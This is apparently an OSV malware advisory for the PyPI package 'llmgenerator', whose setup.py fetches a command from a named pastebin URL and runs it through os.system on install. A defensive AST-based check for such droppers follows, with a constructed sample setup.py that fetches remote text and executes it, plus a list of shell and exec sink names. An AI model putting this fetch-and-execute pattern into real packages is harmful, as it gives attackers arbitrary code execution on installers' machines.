llmgenerator @2.21
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5770
Ecosystem
pypi
Summary
On pip install, setup.py performs an HTTP GET to https://pastebin.com/raw/yBcUM1QB, takes the first line of the response body, and passes it to os.system(f'cmd /c "{cmd_pastebin}"'). The fetched content is mutable, anonymous, and unauthenticated — the author can change what runs on every installer's machine at any time without republishing the package. The package ships no functional Python code (src/ contains only an empty .egg-info directory), confirming the package exists solely as a vehicle for the install-time dropper. The package name impersonates an LLM-tooling brand to attract installs. Installing this package grants arbitrary shell execution on the installer's Windows machine.
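A static pre-install check for the pattern this report describes (a network fetch in setup.py whose result reaches a shell or exec sink), added here as an example; it is not part of the OSV record or of any scanner's code. The sample setup.py strings are constructed, with a placeholder URL in place of the real one, and the fetch/sink name lists are an assumption that covers the common stdlib and requests spellings only.

```python
import ast

# Fully qualified prefixes that mark a remote fetch, and names that mark a shell/exec sink.
FETCH_PREFIXES = ("urllib.request.", "requests.", "http.client.")
SINKS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
         "subprocess.Popen", "subprocess.check_call", "subprocess.check_output",
         "exec", "eval"}

def _dotted(node):
    """'a.b.c' for a Name/Attribute chain, else None (calls on call results are skipped)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))

def _import_map(tree):
    """Local name -> fully qualified origin, e.g. urlopen -> urllib.request.urlopen."""
    table = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            table.update({a.asname: a.name for a in node.names if a.asname})
        elif isinstance(node, ast.ImportFrom) and node.module:
            table.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})
    return table

def find_install_time_risks(source):
    """Return [(lineno, kind, qualified_callee)] for every fetch or sink call, sorted by line."""
    tree = ast.parse(source)
    table = _import_map(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or (callee := _dotted(node.func)) is None:
            continue
        head, _, rest = callee.partition(".")
        full = table.get(head, head) + (f".{rest}" if rest else "")
        if full.startswith(FETCH_PREFIXES):
            findings.append((node.lineno, "network-fetch", full))
        elif full in SINKS:
            findings.append((node.lineno, "shell-or-exec", full))
    return sorted(findings)

def looks_like_dropper(source):
    """True when setup.py both fetches remote content and reaches a shell/exec sink."""
    kinds = {kind for _, kind, _ in find_install_time_risks(source)}
    return {"network-fetch", "shell-or-exec"} <= kinds

# Constructed sample mirroring the reported pattern; placeholder URL, not the real one.
SUSPICIOUS_SETUP_PY = '''\
import os
from urllib.request import urlopen
from setuptools import setup
first_line = urlopen("https://example.invalid/placeholder").read().decode().splitlines()[0]
os.system(first_line)
setup(name="example-pkg", version="0.0.0")
'''
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="example-pkg", version="0.0.0")\n'
```

Run it over each sdist's setup.py (and setup.cfg-driven hooks, which this check does not cover) before the package is allowed into a lock file; a hit on both kinds warrants manual review rather than an automatic install.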
Source: amazon-inspector (06e55ac2d3368516d538c8efaad2b83814dbb61813f36ab5655f77677ca0d6be)